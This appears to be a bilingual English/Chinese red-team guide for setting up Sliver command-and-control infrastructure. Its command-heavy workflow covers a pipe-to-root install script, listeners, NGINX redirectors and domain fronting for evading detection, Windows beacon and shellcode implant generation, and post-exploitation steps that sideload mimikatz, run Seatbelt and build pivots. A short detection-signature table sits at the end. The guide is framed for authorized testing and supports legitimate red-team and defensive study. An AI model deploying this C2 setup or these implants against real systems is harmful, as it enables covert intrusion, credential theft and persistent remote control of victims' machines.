building-c2-infrastructure-with-sliver-framework

Compare original and translation side by side

🇺🇸

Original

English

🇨🇳

Translation

Chinese

Building C2 Infrastructure with Sliver Framework

使用Sliver框架构建C2基础设施

Overview

概述

Sliver is an open-source, cross-platform adversary emulation framework developed by BishopFox, written in Go. It provides red teams with implant generation, multi-protocol C2 channels (mTLS, HTTP/S, DNS, WireGuard), multi-operator support, and extensive post-exploitation capabilities. Sliver supports beacon (asynchronous) and session (interactive) modes, making it suitable for both long-haul operations and interactive exploitation. A properly architected Sliver infrastructure uses redirectors, domain fronting, and HTTPS certificates to maintain operational resilience and avoid detection.

Sliver是由BishopFox开发的开源跨平台敌手仿真框架，使用Go语言编写。它为红队提供植入程序生成、多协议C2通道（mTLS、HTTP/S、DNS、WireGuard）、多操作员支持以及丰富的后渗透测试功能。Sliver支持beacon（异步）和session（交互式）模式，适用于长期操作和交互式渗透测试。架构合理的Sliver基础设施会使用重定向器、域名前置和HTTPS证书来维持操作韧性并避免被检测。

When to Use

适用场景

When deploying or configuring building c2 infrastructure with sliver framework capabilities in your environment
When establishing security controls aligned to compliance requirements
When building or improving security architecture for this domain
When conducting security assessments that require this implementation

在环境中部署或配置基于Sliver框架的C2基础设施能力时
建立符合合规要求的安全控制措施时
构建或改进该领域的安全架构时
开展需要此实现的安全评估时

Prerequisites

前提条件

Familiarity with red teaming concepts and tools
Access to a test or lab environment for safe execution
Python 3.8+ with required dependencies installed
Appropriate authorization for any testing activities

熟悉红队概念与工具
可访问测试或实验室环境以安全执行操作
安装Python 3.8+及所需依赖
拥有任何测试活动的适当授权

Objectives

目标

Deploy a Sliver team server on hardened cloud infrastructure
Configure HTTPS, mTLS, DNS, and WireGuard listeners
Generate implants (beacons and sessions) for target platforms
Set up NGINX or Apache redirectors between implants and the team server
Implement Cloudflare or CDN-based domain fronting for traffic obfuscation
Configure multi-operator access with certificate-based authentication
Establish operational security controls for C2 communications

在加固的云基础设施上部署Sliver团队服务器
配置HTTPS、mTLS、DNS和WireGuard监听器
为目标平台生成植入程序（beacon和session）
在植入程序与团队服务器之间设置NGINX或Apache重定向器
实施基于Cloudflare或CDN的域名前置以混淆流量
配置基于证书认证的多操作员访问权限
为C2通信建立操作安全控制措施

MITRE ATT&CK Mapping

MITRE ATT&CK映射

T1071.001 - Application Layer Protocol: Web Protocols
T1071.004 - Application Layer Protocol: DNS
T1573.002 - Encrypted Channel: Asymmetric Cryptography
T1090.002 - Proxy: External Proxy (Redirectors)
T1105 - Ingress Tool Transfer
T1132.001 - Data Encoding: Standard Encoding
T1572 - Protocol Tunneling

T1071.001 - 应用层协议：Web协议
T1071.004 - 应用层协议：DNS
T1573.002 - 加密通道：非对称加密
T1090.002 - 代理：外部代理（重定向器）
T1105 - 入口工具传输
T1132.001 - 数据编码：标准编码
T1572 - 协议隧道

Workflow

工作流程

Phase 1: Team Server Deployment

阶段1：团队服务器部署

Provision a VPS (e.g., DigitalOcean, Linode, AWS EC2) for the team server
Harden the OS: disable SSH password auth, configure UFW/iptables, install fail2ban
Install Sliver using the official install script:
bash
```
curl https://sliver.sh/install | sudo bash
```

Start the Sliver server daemon:

bash

systemctl start sliver
# Or run interactively
sliver-server

Generate operator configuration files for team members:
bash
```
new-operator --name operator1 --lhost <team-server-ip>
```

为团队服务器配置VPS（如DigitalOcean、Linode、AWS EC2）
加固操作系统：禁用SSH密码认证、配置UFW/iptables、安装fail2ban

使用官方安装脚本安装Sliver：

bash

curl https://sliver.sh/install | sudo bash

启动Sliver服务器守护进程：

bash

systemctl start sliver
# 或以交互式方式运行
sliver-server

为团队成员生成操作员配置文件：

bash

new-operator --name operator1 --lhost <team-server-ip>

Phase 2: Listener Configuration

阶段2：监听器配置

Configure an HTTPS listener with a legitimate SSL certificate:

bash

https --lhost 0.0.0.0 --lport 443 --domain c2.example.com --cert /path/to/cert.pem --key /path/to/key.pem

Configure a DNS listener for fallback C2:

bash

dns --domains c2dns.example.com --lport 53

Configure mTLS listener for high-security sessions:
bash
```
mtls --lhost 0.0.0.0 --lport 8888
```
Configure WireGuard listener for tunneled access:
bash
```
wg --lport 51820
```

使用合法SSL证书配置HTTPS监听器：

bash

https --lhost 0.0.0.0 --lport 443 --domain c2.example.com --cert /path/to/cert.pem --key /path/to/key.pem

配置DNS监听器作为备用C2通道：

bash

dns --domains c2dns.example.com --lport 53

配置mTLS监听器以实现高安全性会话：
bash
```
mtls --lhost 0.0.0.0 --lport 8888
```
配置WireGuard监听器以实现隧道访问：
bash
```
wg --lport 51820
```

Phase 3: Redirector Setup

阶段3：重定向器设置

Deploy a separate VPS as a redirector (positioned between targets and team server)

Install and configure NGINX as a reverse proxy:

nginx

server {
    listen 443 ssl;
    server_name c2.example.com;
    ssl_certificate /etc/letsencrypt/live/c2.example.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/c2.example.com/privkey.pem;

    location / {
        proxy_pass https://<team-server-ip>:443;
        proxy_ssl_verify off;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
    }
}

Configure iptables rules on the team server to only accept connections from the redirector:

bash

iptables -A INPUT -p tcp --dport 443 -s <redirector-ip> -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP

Optionally set up Cloudflare as a CDN layer in front of the redirector for domain fronting

部署独立VPS作为重定向器（位于目标与团队服务器之间）

安装并配置NGINX作为反向代理：

nginx

server {
    listen 443 ssl;
    server_name c2.example.com;
    ssl_certificate /etc/letsencrypt/live/c2.example.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/c2.example.com/privkey.pem;

    location / {
        proxy_pass https://<team-server-ip>:443;
        proxy_ssl_verify off;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
    }
}

在团队服务器上配置iptables规则，仅接受来自重定向器的连接：

bash

iptables -A INPUT -p tcp --dport 443 -s <redirector-ip> -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP

可选择在重定向器前设置Cloudflare作为CDN层以实现域名前置

Phase 4: Implant Generation

阶段4：植入程序生成

Generate an HTTPS beacon implant:

bash

generate beacon --http https://c2.example.com --os windows --arch amd64 --format exe --name payload

Generate a DNS beacon for restricted networks:

bash

generate beacon --dns c2dns.example.com --os windows --arch amd64

Generate a shellcode payload for injection:

bash

generate --http https://c2.example.com --os windows --arch amd64 --format shellcode

Configure beacon jitter and callback intervals:

bash

generate beacon --http https://c2.example.com --seconds 60 --jitter 30

生成HTTPS beacon植入程序：

bash

generate beacon --http https://c2.example.com --os windows --arch amd64 --format exe --name payload

为受限网络生成DNS beacon：

bash

generate beacon --dns c2dns.example.com --os windows --arch amd64

生成用于注入的shellcode payload：

bash

generate --http https://c2.example.com --os windows --arch amd64 --format shellcode

配置beacon抖动和回调间隔：

bash

generate beacon --http https://c2.example.com --seconds 60 --jitter 30

Phase 5: Post-Exploitation Operations

阶段5：后渗透测试操作

Interact with active beacons/sessions:

bash

beacons        # List active beacons
use <beacon-id> # Interact with a beacon

Execute post-exploitation modules:

bash

ps              # Process listing
netstat         # Network connections
execute-assembly /path/to/Seatbelt.exe -group=all  # Run .NET assemblies
sideload /path/to/mimikatz.dll  # Load DLLs

Set up pivots for internal network access:

bash

pivots tcp --bind 0.0.0.0:9898  # Create pivot listener on compromised host

Use BOF (Beacon Object Files) for in-memory execution:

bash

armory install sa-ldapsearch  # Install from armory
sa-ldapsearch -- "(objectClass=user)"  # Execute BOF

与活跃的beacon/session交互：

bash

beacons        # 列出活跃beacon
use <beacon-id> # 与指定beacon交互

执行后渗透测试模块：

bash

ps              # 进程列表
netstat         # 网络连接
execute-assembly /path/to/Seatbelt.exe -group=all  # 运行.NET程序集
sideload /path/to/mimikatz.dll  # 加载DLL

设置 pivot 以访问内部网络：

bash

pivots tcp --bind 0.0.0.0:9898  # 在受感染主机上创建pivot监听器

使用BOF（Beacon Object Files）实现内存中执行：

bash

armory install sa-ldapsearch  # 从armory安装
sa-ldapsearch -- "(objectClass=user)"  # 执行BOF

Tools and Resources

工具与资源

Tool	Purpose	Platform
Sliver Server	C2 team server and implant management	Linux/macOS/Windows
Sliver Client	Operator console for team members	Cross-platform
NGINX	Redirector and reverse proxy	Linux
Certbot	Let's Encrypt SSL certificate generation	Linux
Cloudflare	CDN and domain fronting	Cloud
Armory	Sliver extension/BOF package manager	Built-in

工具	用途	平台
Sliver Server	C2团队服务器与植入程序管理	Linux/macOS/Windows
Sliver Client	团队成员操作员控制台	跨平台
NGINX	重定向器与反向代理	Linux
Certbot	Let's Encrypt SSL证书生成	Linux
Cloudflare	CDN与域名前置	云端
Armory	Sliver扩展/BOF包管理器	内置

Detection Signatures

检测特征

Indicator	Detection Method
Default Sliver HTTP headers	Network traffic analysis for unusual User-Agent strings
mTLS on non-standard ports	Firewall logs for outbound connections to unusual ports
DNS TXT record queries with high entropy	DNS log analysis for encoded C2 traffic
WireGuard UDP traffic on port 51820	Network flow analysis for WireGuard handshake patterns
Sliver implant file hashes	EDR/AV signature matching against known Sliver samples

指标	检测方法
默认Sliver HTTP头	分析网络流量中的异常User-Agent字符串
非标准端口上的mTLS	分析防火墙日志中的非标准端口出站连接
高熵DNS TXT记录查询	分析DNS日志中的编码C2流量
51820端口上的WireGuard UDP流量	分析网络流中的WireGuard握手模式
Sliver植入程序文件哈希	EDR/AV根据已知Sliver样本进行特征匹配

building-c2-infrastructure-with-sliver-framework

Original

Translation

Building C2 Infrastructure with Sliver Framework

使用Sliver框架构建C2基础设施

Overview

概述

When to Use

适用场景

Prerequisites

前提条件

Objectives

目标

MITRE ATT&CK Mapping

MITRE ATT&CK映射

Workflow

工作流程

Phase 1: Team Server Deployment

阶段1：团队服务器部署

Phase 2: Listener Configuration

阶段2：监听器配置

Phase 3: Redirector Setup

阶段3：重定向器设置

Phase 4: Implant Generation

阶段4：植入程序生成

Phase 5: Post-Exploitation Operations

阶段5：后渗透测试操作

Tools and Resources

工具与资源

Detection Signatures

检测特征

Validation Criteria

验证标准